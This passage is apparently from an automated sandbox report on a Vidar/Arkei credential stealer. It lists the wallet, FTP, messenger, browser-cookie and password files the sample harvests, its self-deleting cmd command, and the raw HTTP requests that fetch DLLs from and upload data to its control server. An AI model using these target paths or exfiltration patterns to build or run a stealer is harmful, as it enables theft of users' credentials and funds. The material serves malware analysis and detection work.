  808. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  809.  
  810.  
  811. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  812.  
  813.  
  814. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\"
  815.  
  816.  
  817. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  818.  
  819.  
  820. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\*.*"
  821.  
  822.  
  823. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  824.  
  825.  
  826. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\"
  827.  
  828.  
  829. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\*.*"
  830.  
  831.  
  832. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  833.  
  834.  
  835. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  836.  
  837.  
  838. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\"
  839.  
  840.  
  841. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\*.*"
  842.  
  843.  
  844. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  845.  
  846.  
  847. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  848.  
  849.  
  850. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  851.  
  852.  
  853. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  854.  
  855.  
  856. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  857.  
  858.  
  859. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\"
  860.  
  861.  
  862. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\*.*"
  863.  
  864.  
  865. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  866.  
  867.  
  868. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\"
  869.  
  870.  
  871. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  872.  
  873.  
  874. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\*.*"
  875.  
  876.  
  877.  
  878.  
  879. "Description": "Harvests credentials from local FTP client softwares",
  880. "Details":
  881.  
  882. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  883.  
  884.  
  885.  
  886.  
  887. "Description": "Harvests information related to installed instant messenger clients",
  888. "Details":
  889.  
  890. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  891.  
  892.  
  893.  
  894.  
  895. "Description": "Collects information to fingerprint the system",
  896. "Details":
  897.  
  898.  
  899. "Description": "Created network traffic indicative of malicious activity",  (the Suricata hit most plausibly corresponds to the POST to dersed.com recorded above — sent with no Referer and no User-Agent — and to the US_<GUID>.zip archive assembled under C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY and then deleted; the report does not show the POST body, so the exfiltration link is inferred, not observed)
  900. "Details":
  901.  
  902. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  903.  
  904.  
  905.  
  906.  
  907. "Description": "Uses suspicious command line tools or Windows utilities",
  908. "Details":
  909.  
  910. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  911.  
  912.  
  913. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  914.  
  915.  
  916. "command": "taskkill /im 9z25yPQnjM.exe /f"
  917.  
  918.  
  919.  
  920.  
  921.  
  922. * Started Service:  (VaultSvc is the Windows Credential Manager service; its start during the run is consistent with the sample querying the credential vault, but the report does not show the call that triggered it)
  923. "VaultSvc"
  924.  
  925.  
  926. * Mutexes:
  927. "Local\\_!MSFTHISTORY!_",
  928. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  929. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  930. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  931. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  932. "Global\\ADAP_WMI_ENTRY",
  933. "Global\\RefreshRA_Mutex",
  934. "Global\\RefreshRA_Mutex_Lib",
  935. "Global\\RefreshRA_Mutex_Flag"
  936.  
  937.  
  938. * Modified Files:
  939. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  940. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  941. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  942. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  943. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
  944. "C:\\ProgramData\\freebl3.dll",
  945. "C:\\ProgramData\\mozglue.dll",
  946. "C:\\ProgramData\\msvcp140.dll",
  947. "C:\\ProgramData\\nss3.dll",
  948. "C:\\ProgramData\\softokn3.dll",
  949. "C:\\ProgramData\\vcruntime140.dll",
  950. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\ld",
  951. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\historych",
  952. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
  953. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
  954. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\c",
  955. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
  956. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\wd",
  957. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
  958. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
  959. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy\\\\xef\\x94\\x98\\xcd\\xb4\\xef\\x93\\x94\\x18\\xe3\\xa2\\x9e\\xe7\\x9c\\x86\\xc4\\xb8\\xc8\\x82",
  960. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
  961. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
  962. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
  963. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
  964. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12",
  965. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum\\",
  966. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n",
  967. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC\\",
  968. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\\n",
  969. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\",
  970. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash\\",
  971. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge\\\n",
  972. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash\\",
  973. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore\\",
  974. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\",
  975. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\",
  976. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\",
  977. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\",
  978. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\",
  979. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\",
  980. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\",
  981. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\",
  982. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD\\\n",
  983. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\",
  984. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin\\",
  985. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\",
  986. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\",
  987. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\",
  988. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\",
  989. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\",
  990. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\",
  991. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\",
  992. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX\\",
  993. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
  994. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
  995. "\\Device\\LanmanDatagramReceiver",
  996. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  997. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  998. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  999.  
  1000.  
  1001. * Deleted Files:
  1002. "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp",
  1003. "C:\\ProgramData\\freebl3.dll",
  1004. "C:\\ProgramData\\mozglue.dll",
  1005. "C:\\ProgramData\\msvcp140.dll",
  1006. "C:\\ProgramData\\nss3.dll",
  1007. "C:\\ProgramData\\softokn3.dll",
  1008. "C:\\ProgramData\\vcruntime140.dll",
  1009. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
  1010. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill",
  1011. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
  1012. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC",
  1013. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
  1014. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
  1015. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
  1016. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies",
  1017. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
  1018. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
  1019. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads",
  1020. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
  1021. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History",
  1022. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
  1023. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
  1024. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
  1025. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy",
  1026. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft",
  1027. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin",
  1028. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin",
  1029. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin",
  1030. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore",
  1031. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin",
  1032. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin",
  1033. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash",
  1034. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum",
  1035. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC",
  1036. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum",
  1037. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus",
  1038. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin",
  1039. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko",
  1040. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin",
  1041. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD",
  1042. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin",
  1043. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin",
  1044. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin",
  1045. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX",
  1046. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin",
  1047. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin",
  1048. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin",
  1049. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge",
  1050. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin",
  1051. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin",
  1052. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin",
  1053. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin",
  1054. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash",
  1055. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets",
  1056. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
  1057. "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
  1058. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  1059.  
  1060.  
  1061. * Modified Registry Keys:
  1062. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  1063. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1064. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4",
  1065. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  1066. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33",
  1067. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  1068. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708",
  1069. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DCEB3BF5-151E-4025-A595-D330A9AC667A",
  1070. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4\\data",
  1071. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33\\data",
  1072. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708\\data"
  1073.  
  1074.  
  1075. * Deleted Registry Keys:
  1076.  
  1077. * DNS Communications:
  1078.  
  1079. "type": "A",
  1080. "request": "dersed.com",
  1081. "answers":
  1082.  
  1083. "data": "104.200.67.209",
  1084. "type": "A"
  1085.  
  1086.  
  1087.  
  1088.  
  1089. "type": "A",
  1090. "request": "ip-api.com",
  1091. "answers":
  1092.  
  1093. "data": "72.11.140.50",
  1094. "type": "A"
  1095.  
  1096.  
  1097. "data": "66.212.29.250",
  1098. "type": "A"
  1099.  
  1100.  
  1101.  
  1102.  
  1103.  
  1104. * Domains:
  1105.  
  1106. "ip": "104.200.67.209",
  1107. "domain": "dersed.com"
  1108.  
  1109.  
  1110. "ip": "72.11.140.50",
  1111. "domain": "ip-api.com"
  1112.  
  1113.  
  1114.  
  1115. * Network Communication - ICMP:
  1116.  
  1117. * Network Communication - HTTP:
  1118.  
  1119. "count": 1,
  1120. "body": "--1BEF0A57BE110FD467A--\r\n",
  1121. "uri": "http://dersed.com/288",
  1122. "user-agent": "",
  1123. "method": "POST",
  1124. "host": "dersed.com",
  1125. "version": "1.1",
  1126. "path": "/288",
  1127. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1128. "port": 80
  1129.  
  1130.  
  1131. "count": 1,
  1132. "body": "",
  1133. "uri": "http://dersed.com/freebl3.dll",
  1134. "user-agent": "",
  1135. "method": "GET",
  1136. "host": "dersed.com",
  1137. "version": "1.1",
  1138. "path": "/freebl3.dll",
  1139. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1140. "port": 80
  1141.  
  1142.  
  1143. "count": 1,
  1144. "body": "",
  1145. "uri": "http://dersed.com/mozglue.dll",
  1146. "user-agent": "",
  1147. "method": "GET",
  1148. "host": "dersed.com",
  1149. "version": "1.1",
  1150. "path": "/mozglue.dll",
  1151. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1152. "port": 80
  1153.  
  1154.  
  1155. "count": 1,
  1156. "body": "",
  1157. "uri": "http://dersed.com/msvcp140.dll",
  1158. "user-agent": "",
  1159. "method": "GET",
  1160. "host": "dersed.com",
  1161. "version": "1.1",
  1162. "path": "/msvcp140.dll",
  1163. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1164. "port": 80
  1165.  
  1166.  
  1167. "count": 1,
  1168. "body": "",
  1169. "uri": "http://dersed.com/nss3.dll",
  1170. "user-agent": "",
  1171. "method": "GET",
  1172. "host": "dersed.com",
  1173. "version": "1.1",
  1174. "path": "/nss3.dll",
  1175. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1176. "port": 80
  1177.  
  1178.  
  1179. "count": 1,
  1180. "body": "",
  1181. "uri": "http://dersed.com/softokn3.dll",
  1182. "user-agent": "",
  1183. "method": "GET",
  1184. "host": "dersed.com",
  1185. "version": "1.1",
  1186. "path": "/softokn3.dll",
  1187. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1188. "port": 80
  1189.  
  1190.  
  1191. "count": 1,
  1192. "body": "",
  1193. "uri": "http://dersed.com/vcruntime140.dll",
  1194. "user-agent": "",
  1195. "method": "GET",
  1196. "host": "dersed.com",
  1197. "version": "1.1",
  1198. "path": "/vcruntime140.dll",
  1199. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1200. "port": 80
  1201.  
  1202.  
  1203. "count": 1,
  1204. "body": "--1BEF0A57BE110FD467A--\r\n",
  1205. "uri": "http://ip-api.com/line/",
  1206. "user-agent": "",
  1207. "method": "POST",
  1208. "host": "ip-api.com",
  1209. "version": "1.1",
  1210. "path": "/line/",
  1211. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1212. "port": 80
  1213.  
  1214.  
  1215. "count": 1,
  1216. "body": "",
  1217. "uri": "http://dersed.com/",
  1218. "user-agent": "",
  1219. "method": "POST",
  1220. "host": "dersed.com",
  1221. "version": "1.1",
  1222. "path": "/",
  1223. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40398\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1224. "port": 80
  1225.  
  1226.  
  1227.  
  1228. * Network Communication - SMTP:
  1229.  
  1230. * Network Communication - Hosts:
  1231.  
  1232. "country_name": "United States",
  1233. "ip": "72.11.140.50",
  1234. "inaddrarpa": "",
  1235. "hostname": "ip-api.com"
  1236.  
  1237.  
  1238. "country_name": "United States",
  1239. "ip": "104.200.67.209",
  1240. "inaddrarpa": "",
  1241. "hostname": "dersed.com"
  1242.  
  1243.  
  1244.  
  1245. * Network Communication - IRC: